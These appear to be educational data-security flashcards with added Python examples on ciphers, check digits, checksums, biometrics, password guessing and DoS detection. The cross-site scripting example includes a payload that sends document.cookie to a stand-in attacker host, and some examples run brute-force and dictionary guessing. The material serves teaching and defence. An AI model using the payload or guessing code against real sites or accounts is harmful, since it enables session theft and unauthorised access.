Data Security and Integrity Processes Flashcards
Access Levels
allowing different users to have access to different data, such as giving some people Read Only access, or allowing some people to access more data than others
APT
Advanced Persistent Threat
a set of stealthy and continuous computer hacking processes, often orchestrated by humans targeting a specific entity, usually an organisation and/or nation, for business or political motives; the attacker aims to stay inside the target's systems undetected for a long period
APT1
a professional cyber espionage group operating from China
APT28
Fancy Bear
a state-sponsored group, attributed to Russia, that uses malware to gather intelligence from foreign governments and other targets
APT29
HAMMERTOSS
a malware backdoor, attributed to a Russian group, that fetches its commands through Twitter and GitHub so that its traffic blends in with normal web use
Adware
not dangerous in its own right, but may contain links to other malware, such as viruses and key loggers
Attack Vectors
the route or method by which an attacker reaches a target, for example a phishing email, an unpatched network service or an infected USB drive
Backdoor
a hidden way into a program or system, built in by its developer or planted by an attacker, that lets someone bypass the normal security controls to get to it
Back-Up of Servers
this should be done off-site so that back-ups are not destroyed by the same fire or flood that destroys the originals, and the back-up location should be known only on a need-to-know basis
Baudot Code
a 5-bit binary code representing each teleprinter character; the Vernam cipher combines each character's code with a key of the same length using XOR (modulo-2 addition) to encrypt data
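An added example (not from the flashcards) of the Vernam operation over 5-bit codes. The alphabet below is a stand-in (space=0, A=1 ... Z=26), not the real Baudot/ITA2 table, and the demonstration key is constructed; the last function shows why the key must never be reused, because XORing two ciphertexts made with the same key cancels the key out.

```python
# Added example, not from the original flashcards.
# Stand-in 5-bit alphabet (assumption: space=0, A=1..Z=26); the real
# Baudot/ITA2 table differs, but the XOR mechanics are identical.
import secrets

ALPHABET = " ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def encode5(text):
    """Map upper-case text (letters and spaces only) to a list of 5-bit codes."""
    return [ALPHABET.index(ch) for ch in text.upper()]


def decode5(codes):
    """Map 5-bit codes back to text; codes outside the stand-in alphabet print as '?'."""
    return "".join(ALPHABET[c] if c < len(ALPHABET) else "?" for c in codes)


def vernam(codes, key):
    """The Vernam operation: XOR each 5-bit code with the matching 5-bit key value.
    XOR is its own inverse, so the same call decrypts."""
    if len(key) < len(codes):
        raise ValueError("key must be at least as long as the message")
    return [c ^ k for c, k in zip(codes, key)]


def random_key(length):
    """A fresh one-time key: one uniformly random 5-bit value per character."""
    return [secrets.randbelow(32) for _ in range(length)]


def crib_drag(ct1, ct2, known_fragment, position):
    """If one key encrypted two messages, ct1 XOR ct2 == pt1 XOR pt2 (the key cancels).
    XORing a known fragment of pt1 at `position` then reveals pt2 at that position."""
    combined = [a ^ b for a, b in zip(ct1, ct2)]
    crib = encode5(known_fragment)
    segment = combined[position:position + len(crib)]
    return decode5([x ^ k for x, k in zip(segment, crib)])


# Constructed key (16 values) for a repeatable demonstration; use random_key() in practice.
DEMO_KEY = [7, 19, 3, 31, 0, 12, 25, 4, 9, 30, 2, 17, 11, 6, 21, 14]

if __name__ == "__main__":
    ct1 = vernam(encode5("ATTACK AT DAWN"), DEMO_KEY)
    print(decode5(vernam(ct1, DEMO_KEY)))              # round-trips to ATTACK AT DAWN
    ct2 = vernam(encode5("RETREAT NOW OK"), DEMO_KEY)  # same key reused: a mistake
    print(crib_drag(ct1, ct2, "ATTACK", 0))            # leaks the start of the second message
```

With a fresh, random, never-reused key every ciphertext value is equally likely, which is what makes the one-time pad unbreakable; the crib-dragging function is the standard way that guarantee is lost the moment a key is used twice.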
Behavioural Identifiers
the distinctive ways in which individuals act, including typing patterns, gait and other gestures; some behavioural identifiers can be used for continuous authentication while the user is active
Bespoke Tools
specifically developed tools to target known vulnerabilities or poorly designed software
Biometric Exposures
high-tech cameras and other devices support the use of biometrics, but can also be used by attackers; people do not cover or hide their physical and behavioural features, so an attacker can capture biometric data simply by observing people without their permission or knowledge
Biometric Template
the stored reference produced from a user's enrolled biometric sample; a fresh sample is compared against it during verification, and the template is stored encrypted so that a stolen copy cannot be used directly
Blagging
persuading someone to give away information such as passwords directly, usually by inventing a convincing story or pretext
Bot Activity
a software application that runs automated tasks on the Internet, usually with the intent to imitate human activity
Anonymisation Proxy
a tool that attempts to make activity on the Internet untraceable by acting as an intermediary and privacy shield between a client computer and the rest of the Internet
CAPTCHA Solving Zombie
bots that can solve CAPTCHA
Click Fraud Zombie
the practice of artificially inflating traffic statistics for online advertisements
DoS Extortion Zombie
a bot used to carry out DoS attacks, typically so that its controller can demand payment to stop them
Spam Zombie
a bot that sends out spam
Botnet
a network of computers infected with malware and controlled as a group by an attacker, for example to perform a distributed DoS attack or to send spam
Browser Script Attack
also known as cross-site scripting (XSS): a type of injection attack in which malicious scripts are injected into otherwise benign and trusted websites and then run in the browsers of other visitors
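An added example (not from the flashcards) of how such an injection happens and how it is prevented: the same comment-rendering function written the vulnerable way and the hardened way. The function names, the page fragment and the attacker inputs are constructed for illustration.

```python
# Added example, not from the original flashcards: vulnerable and hardened
# rendering of untrusted input into HTML. Names and payloads are constructed.
import html


def render_comment_unsafe(author, comment):
    """VULNERABLE: untrusted input is pasted straight into HTML, so a comment
    containing <script> runs in every other visitor's browser."""
    return f'<div class="comment" data-author="{author}">{comment}</div>'


def render_comment_safe(author, comment):
    """Hardened: escape <, >, & and quotes for both the text node and the attribute
    value, so the input is displayed as text instead of being parsed as markup."""
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'{html.escape(comment, quote=True)}</div>')


def contains_live_markup(rendered, payload_tag):
    """Crude check used here only to show the difference: does the raw tag survive in the page?"""
    return payload_tag.lower() in rendered.lower()


# Constructed attacker inputs: one for the text context, one that breaks out of an attribute.
SCRIPT_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
ATTRIBUTE_PAYLOAD = 'x" onmouseover="alert(document.domain)'

if __name__ == "__main__":
    print(render_comment_unsafe("alice", SCRIPT_PAYLOAD))
    print(render_comment_safe("alice", SCRIPT_PAYLOAD))
    print(render_comment_unsafe(ATTRIBUTE_PAYLOAD, "hi"))
    print(render_comment_safe(ATTRIBUTE_PAYLOAD, "hi"))
```

Note that escaping must match the context the value lands in: the second payload contains no angle brackets at all and would pass a naive "strip <script>" filter, yet it still injects an event handler unless the double quote is escaped as well.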
Brute Force Attack
where an attacker makes many guesses at your password in quick succession, working through every possible combination until one is correct
Caesar Cipher
a substitution cipher in which each letter of the message is replaced by the letter a fixed number of positions further along the alphabet. It is not secure: patterns in the text are preserved, the most frequently used ciphertext letters sit exactly where the plaintext's most frequently used letters sit, the number of possible keys (25) is too small to resist a brute-force attack, and the same shift is likely to be used for every message. It can therefore be broken either by trying every key or by letter-frequency analysis
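An added example (not from the flashcards) implementing the cipher together with the two attacks the card names. The English letter-frequency table is approximate and the plaintext is constructed; the frequency attack scores each of the 26 candidate shifts with a chi-squared statistic against that table and picks the most English-looking one, so it works even when the most common ciphertext letter is not E.

```python
# Added example, not from the original flashcards: Caesar cipher plus a
# 25-key brute force and a letter-frequency (chi-squared) attack.
import string
from collections import Counter

ALPHA = string.ascii_uppercase

# Approximate relative frequency (%) of letters in English text.
ENGLISH_FREQ = {
    "A": 8.2, "B": 1.5, "C": 2.8, "D": 4.3, "E": 12.7, "F": 2.2, "G": 2.0,
    "H": 6.1, "I": 7.0, "J": 0.15, "K": 0.8, "L": 4.0, "M": 2.4, "N": 6.7,
    "O": 7.5, "P": 1.9, "Q": 0.1, "R": 6.0, "S": 6.3, "T": 9.1, "U": 2.8,
    "V": 1.0, "W": 2.4, "X": 0.15, "Y": 2.0, "Z": 0.07,
}


def caesar(text, shift):
    """Shift every letter by `shift` places (a negative shift decrypts); other characters pass through."""
    out = []
    for ch in text.upper():
        out.append(ALPHA[(ALPHA.index(ch) + shift) % 26] if ch in ALPHA else ch)
    return "".join(out)


def brute_force(ciphertext):
    """Only 25 keys exist, so try them all and let a human pick the readable candidate."""
    return [(shift, caesar(ciphertext, -shift)) for shift in range(1, 26)]


def chi_squared(text):
    """How far the letter counts in `text` are from English: lower means more English-like."""
    letters = [ch for ch in text if ch in ALPHA]
    if not letters:
        return float("inf")
    counts = Counter(letters)
    n = len(letters)
    score = 0.0
    for ch in ALPHA:
        expected = ENGLISH_FREQ[ch] * n / 100
        score += (counts[ch] - expected) ** 2 / expected
    return score


def frequency_attack(ciphertext):
    """Return the shift whose decryption looks most like English; no key needed.
    This works because the cipher preserves the plaintext's letter-frequency pattern."""
    return min(range(26), key=lambda shift: chi_squared(caesar(ciphertext, -shift)))


# Constructed plaintext for the demonstration.
MESSAGE = "THE ENEMY HAS SEEN THE SECRET MESSAGE SENT TO THE EASTERN GATE AT DAWN"

if __name__ == "__main__":
    ct = caesar(MESSAGE, 7)
    print(ct)
    shift = frequency_attack(ct)
    print("recovered shift:", shift)
    print(caesar(ct, -shift))
```

On short ciphertexts the frequency attack can mis-rank shifts, which is why the brute-force listing is kept alongside it: with only 25 candidates a person can read them all.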
Cartesian Product
the set of all ordered pairs formed by taking one element from each of two sets; in a database, a join with no join condition returns every combination of rows from the two tables
Check Digit
an extra digit or character added to the end of a long code, computed by applying an algorithm to the other digits. When the code is entered, the check digit is recalculated and compared to the digit at the end of the code; a mismatch shows the code was mistyped or mis-read
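An added example (not from the flashcards): the Luhn algorithm, the check-digit scheme used on payment card numbers, with a test of which entry errors it catches. The sample codes are constructed; the last one shows the scheme's well-known blind spot, the adjacent transposition of 0 and 9.

```python
# Added example, not from the original flashcards: Luhn check digits and the
# errors they do and do not detect.


def luhn_check_digit(partial):
    """Compute the check digit for a string of digits that does not yet have one."""
    total = 0
    # Working from the right, double every second digit (starting with the
    # rightmost) and subtract 9 from any doubled value above 9.
    for index, ch in enumerate(reversed(partial)):
        digit = int(ch)
        if index % 2 == 0:
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return (10 - total % 10) % 10


def luhn_valid(code):
    """Recompute the check digit from the leading digits and compare it with the last digit."""
    if not code.isdigit() or len(code) < 2:
        return False
    return int(code[-1]) == luhn_check_digit(code[:-1])


def single_digit_errors_caught(code):
    """Change each digit in turn to every other value; count how many changes are detected."""
    caught = tried = 0
    for pos in range(len(code)):
        for d in "0123456789":
            if d == code[pos]:
                continue
            tried += 1
            if not luhn_valid(code[:pos] + d + code[pos + 1:]):
                caught += 1
    return caught, tried


if __name__ == "__main__":
    print(luhn_check_digit("7992739871"))      # 3, so the full code is 79927398713
    print(luhn_valid("79927398713"), luhn_valid("79927398723"))
    print(single_digit_errors_caught("79927398713"))
    # Known blind spot: swapping the adjacent digits 09 and 90 is not detected.
    print(luhn_valid("10090"), luhn_valid("10900"))
```

Every single-digit error is caught because the doubling step maps each digit to a distinct value, but a check digit is a typo detector, not an integrity control: anyone who knows the algorithm can produce a valid code, so it offers no protection against deliberate tampering.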
Checksums
a simple error-detection scheme. Each transmitted packet is accompanied by a numerical value computed from the message contents (for example a count of its set bits or a sum of its bytes). The receiving station applies the same formula to the message and checks that the value is the same. If not, the receiver assumes that an error has occurred and asks the sending computer to re-send the packet
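An added example (not from the flashcards) that runs three checksum formulas over a constructed packet, flips bits in transit, and shows which corruptions each scheme detects: the set-bit count the card describes, a byte sum, and Fletcher-16, whose second running sum also depends on byte order.

```python
# Added example, not from the original flashcards: three checksum schemes
# applied to a constructed packet, showing which corruptions each detects.


def popcount_checksum(data: bytes) -> int:
    """The scheme the card describes: count the set bits in the message (mod 256)."""
    return sum(bin(b).count("1") for b in data) % 256


def additive_checksum(data: bytes) -> int:
    """Sum of all byte values, mod 256."""
    return sum(data) % 256


def fletcher16(data: bytes) -> int:
    """Fletcher-16: two running sums, the second of which depends on byte order."""
    sum1 = sum2 = 0
    for b in data:
        sum1 = (sum1 + b) % 255
        sum2 = (sum2 + sum1) % 255
    return (sum2 << 8) | sum1


def receiver_accepts(data: bytes, checksum: int, scheme) -> bool:
    """What the receiving station does: recompute with the same formula and compare."""
    return scheme(data) == checksum


def flip_bits(data: bytes, *positions) -> bytes:
    """Corrupt a copy of `data` by flipping the given (byte_index, bit) positions."""
    out = bytearray(data)
    for byte_index, bit in positions:
        out[byte_index] ^= 1 << bit
    return bytes(out)


def detection_report(original: bytes, corrupted: bytes) -> dict:
    """For each scheme, True if the receiver would reject the corrupted packet."""
    report = {}
    for scheme in (popcount_checksum, additive_checksum, fletcher16):
        sent_checksum = scheme(original)
        report[scheme.__name__] = not receiver_accepts(corrupted, sent_checksum, scheme)
    return report


# Constructed packet payload.
PACKET = b"PAY 100 GBP TO ACCT 42"

if __name__ == "__main__":
    # One bit flipped: every scheme notices.
    print(detection_report(PACKET, flip_bits(PACKET, (4, 0))))
    # 'A' (0x41) becomes 'B' (0x42): one bit set, one cleared, so the bit count is unchanged.
    print(detection_report(PACKET, flip_bits(PACKET, (1, 0), (1, 1))))
    # Last two bytes swapped ("42" -> "24"): counts and sums are unchanged, only Fletcher notices.
    print(detection_report(PACKET, PACKET[:-2] + b"24"))
```

The swap case is the one a practitioner cares about: an additive checksum cannot tell reordered bytes apart, and none of these schemes protects against an attacker who modifies the packet and recomputes the checksum, which is what a keyed MAC is for.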
Commodity Tools
freely available tools and scripts on the internet, including specialist tools for vulnerability scanning or penetration testing
Computer Misuse Act
UK legislation that protects computers and the data held on them from hackers, making unauthorised access to computer material, unauthorised access with intent to commit further offences, and unauthorised modification of computer data illegal
Contingency Planning
planning in advance how the organisation will respond to, and keep operating during, a disaster or major security incident
Cyberattack
attacks on computers or networks, often using various types of malware; typically described in four stages: survey, delivery, breach and attack
Survey
researching the target and reviewing available information to identify potential vulnerabilities and possible lines of attack
Delivery
crafting an attack to exploit a vulnerability and delivering it to the target
Breach
exploiting a vulnerability to gain unauthorised access to the system or its information
Attack
carrying out actions on the compromised system to achieve the attacker's intended negative impact, such as stealing or altering data or disrupting services
Data Protection Act 2018
UK law governing personal data held by organisations, stating that personal data must be kept accurate and up to date, must not be held for longer than is necessary, that the individuals the data relates to can access it and have it corrected, and that they can receive compensation if the law is not followed regarding their data
First Data Protection Principle
processing of personal data for any of the law enforcement purposes must be lawful and fair
Second Data Protection Principle
the law enforcement purpose for which personal data is collected on any occasion must be specified, explicit and legitimate, and personal data so collected must not be processed in a manner that is incompatible with the purpose for which it was collected
Third Data Protection Principle
personal data processed for any of the law enforcement purposes must be adequate, relevant and not excessive in relation to the purpose for which it is processed
Fourth Data Protection Principle
personal data processed for any of the law enforcement purposes must be accurate and, where necessary, kept up to date, and every reasonable step must be taken to ensure that personal data that is inaccurate, having regard to the law enforcement purpose for which it is processed, is erased or rectified without delay
Fifth Data Protection Principle
personal data processed for any law enforcement purposes must be kept for no longer than is necessary for the purposes for which it is processed
Sixth Data Protection Principle
personal data processed for any of the law enforcement purposes must be so processed in a manner that ensures appropriate security of the personal data, using appropriate technical and organisational measures
Decision Process
the stage of a biometric system that takes the output of the matching step (a similarity score between the fresh sample and the stored template) and compares it with a threshold to accept or reject the claimed identity
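An added example (not from the flashcards) of the matching and decision steps described in the Biometric Template and Decision Process cards. The templates are constructed bit strings so that it runs offline; real systems compare feature vectors from a sensor, and the thresholds are illustrative. It also computes the two error rates a practitioner tunes the threshold against.

```python
# Added example, not from the original flashcards: matching and decision
# steps of a biometric verifier over constructed binary templates.


def hamming_distance(a: bytes, b: bytes) -> int:
    """Number of differing bits between two equal-length templates."""
    if len(a) != len(b):
        raise ValueError("templates must be the same length")
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def match_score(stored_template: bytes, fresh_sample: bytes) -> float:
    """Matching step: fraction of bits that differ (0.0 = identical, about 0.5 = unrelated)."""
    return hamming_distance(stored_template, fresh_sample) / (8 * len(stored_template))


def decide(stored_template: bytes, fresh_sample: bytes, threshold: float) -> bool:
    """Decision step: accept the claimed identity if the score is within the threshold."""
    return match_score(stored_template, fresh_sample) <= threshold


def error_rates(stored_template, genuine_samples, impostor_samples, threshold):
    """False reject rate (genuine users turned away) and false accept rate
    (impostors let in) for one threshold setting."""
    frr = sum(not decide(stored_template, s, threshold) for s in genuine_samples) / len(genuine_samples)
    far = sum(decide(stored_template, s, threshold) for s in impostor_samples) / len(impostor_samples)
    return frr, far


def perturb(template: bytes, bit_positions) -> bytes:
    """Constructed 'fresh sample': the enrolled template with some bits flipped by sensor noise."""
    out = bytearray(template)
    for pos in bit_positions:
        out[pos // 8] ^= 1 << (pos % 8)
    return bytes(out)


# Constructed enrolled template (16 bytes = 128 bits).
ENROLLED = bytes([0x3C, 0xA5, 0x0F, 0xF0, 0x96, 0x69, 0xC3, 0x55,
                  0xAA, 0x11, 0xEE, 0x7B, 0x84, 0x2D, 0xD2, 0x1F])
GENUINE = [perturb(ENROLLED, range(0, 128, 20)),   # 7 bits of sensor noise
           perturb(ENROLLED, range(3, 128, 10))]   # 13 bits of sensor noise
IMPOSTORS = [bytes(b ^ 0xAA for b in ENROLLED),     # half the bits differ
             bytes(b ^ 0x0F for b in ENROLLED)]     # half the bits differ

if __name__ == "__main__":
    for threshold in (0.05, 0.15, 0.6):
        print(threshold, error_rates(ENROLLED, GENUINE, IMPOSTORS, threshold))
```

Lowering the threshold rejects more genuine users (higher FRR) and raising it admits more impostors (higher FAR); the threshold is the security control, and the stored template is the secret that the encryption mentioned in the card protects.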
Decryption
the process of turning ciphertext back into the original data, known as plaintext, using the key
DoS Attack
Denial of Service Attack
attempt to make your website and servers unavailable to legitimate users by swamping a system with fake requests, usually in an attempt to exhaust server resources
Dictionary Attack
where the attacker uses a file of likely passwords, such as every word in a dictionary and commonly chosen passwords, to guess your password; much faster than brute force, but it only finds passwords that appear in the list
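An added example (not from the flashcards) covering both the Brute Force Attack and Dictionary Attack cards: each attack is run against a password hash and the number of guesses it needs is counted, then compared with what an online lockout policy would allow. The wordlist, passwords, hash function and lockout numbers are constructed for illustration.

```python
# Added example, not from the original flashcards: dictionary and brute-force
# guessing against a password hash, with guess counts and a lockout estimate.
import hashlib
import itertools
import string


def hash_password(password: str, salt: bytes = b"") -> str:
    """Plain salted SHA-256, used here only so the attacks have something to test guesses against."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def dictionary_attack(target_hash, wordlist, salt=b""):
    """Try each candidate from a list of likely passwords; returns (password, guesses) or (None, guesses)."""
    for guesses, word in enumerate(wordlist, start=1):
        if hash_password(word, salt) == target_hash:
            return word, guesses
    return None, len(wordlist)


def brute_force_attack(target_hash, alphabet, max_length, salt=b""):
    """Try every string over `alphabet` up to `max_length`, shortest first."""
    guesses = 0
    for length in range(1, max_length + 1):
        for combo in itertools.product(alphabet, repeat=length):
            guesses += 1
            candidate = "".join(combo)
            if hash_password(candidate, salt) == target_hash:
                return candidate, guesses
    return None, guesses


def keyspace_size(alphabet_size, max_length):
    """Number of candidates a brute force must consider in the worst case."""
    return sum(alphabet_size ** n for n in range(1, max_length + 1))


def minutes_under_lockout(guesses, attempts_per_window=5, window_minutes=15):
    """Time an online attacker needs if the server allows only a few attempts per window."""
    return ((guesses - 1) // attempts_per_window) * window_minutes


# Constructed wordlist of common passwords.
WORDLIST = ["password", "letmein", "qwerty", "dragon", "sunshine", "football"]

if __name__ == "__main__":
    weak = hash_password("dragon")
    print(dictionary_attack(weak, WORDLIST))                            # found on guess 4
    short = hash_password("cab")
    print(brute_force_attack(short, string.ascii_lowercase, 3))         # found on guess 2056
    print(keyspace_size(26, 3), keyspace_size(95, 8))                    # why length and variety matter
    print(minutes_under_lockout(2056))                                   # the same 2056 guesses online
```

The two numbers at the end are the defender's levers: a large character set and length push the brute-force keyspace out of reach, while rate limiting or lockout turns thousands of cheap offline guesses into days of online attempts; against a leaked hash only a slow, salted password hash provides that cost.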
Disaster Recovery
plans for restoring systems and data after a disaster, for example by rebuilding servers from off-site back-ups
Disposal of Files
securely removing files that are no longer required, so that only current, accurate copies remain and obsolete data cannot be leaked or mistaken for the live version
Distributed DoS
a DoS attack launched from many computers across many networks at once, typically a botnet, which makes it far harder to block because there is no single source to filter and the combined traffic is much larger
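An added example (not from the flashcards) of detection logic for the DoS Attack and Distributed DoS cards, run over constructed web-server log lines in the common Apache/nginx format. It shows why a per-source request limit catches a single flooding client but only an aggregate limit catches a distributed flood in which no individual source looks abnormal. The IP addresses, timestamps and limits are constructed.

```python
# Added example, not from the original flashcards: flood detection over
# constructed web-server log lines (per-source limit vs aggregate limit).
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')


def parse_line(line):
    """Extract source IP and timestamp from an Apache/nginx combined-format line."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts


def detect_floods(lines, window_seconds=10, per_ip_limit=20, total_limit=50):
    """Bucket requests into fixed windows. Returns (IPs over the per-source limit,
    start times of windows whose total exceeds the aggregate limit while no single
    source exceeds its own limit, i.e. the distributed pattern)."""
    buckets = defaultdict(lambda: defaultdict(int))
    for line in lines:
        ip, ts = parse_line(line)
        buckets[int(ts.timestamp()) // window_seconds][ip] += 1
    noisy_ips, distributed_windows = set(), []
    for window, per_ip in sorted(buckets.items()):
        over = {ip for ip, n in per_ip.items() if n > per_ip_limit}
        noisy_ips |= over
        if not over and sum(per_ip.values()) > total_limit:
            distributed_windows.append(window * window_seconds)
    return noisy_ips, distributed_windows


def make_line(ip, timestamp, path="/"):
    """Build one constructed combined-format log line."""
    return f'{ip} - - [{timestamp}] "GET {path} HTTP/1.1" 200 512'


def build_sample_log():
    """Constructed log: normal traffic, then one source flooding, then 60 sources
    each sending a single request in the same window (the distributed case)."""
    lines = [make_line("192.0.2.10", "10/Oct/2023:12:00:01 +0000", "/index.html"),
             make_line("192.0.2.11", "10/Oct/2023:12:00:02 +0000", "/about")]
    lines += [make_line("203.0.113.5", "10/Oct/2023:12:00:03 +0000") for _ in range(30)]
    lines += [make_line(f"198.51.100.{i}", "10/Oct/2023:12:05:00 +0000") for i in range(1, 61)]
    return lines


if __name__ == "__main__":
    noisy, distributed = detect_floods(build_sample_log())
    print("sources over per-IP limit:", noisy)
    print("windows with a distributed flood (epoch seconds):", distributed)
```

The per-IP rule is what a web application firewall or rate limiter applies; the aggregate rule is why distributed floods are normally handled upstream, by the network provider or a scrubbing service, rather than by the server itself.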
Driving Table
in a multi-table SQL query, the table the database reads first and uses to drive lookups into the other tables; choosing a small or well-filtered driving table reduces the work the query does
Eavesdropping
where attackers intercept communications without the parties' knowledge, for example to capture credentials or encryption keys and then decode encrypted messages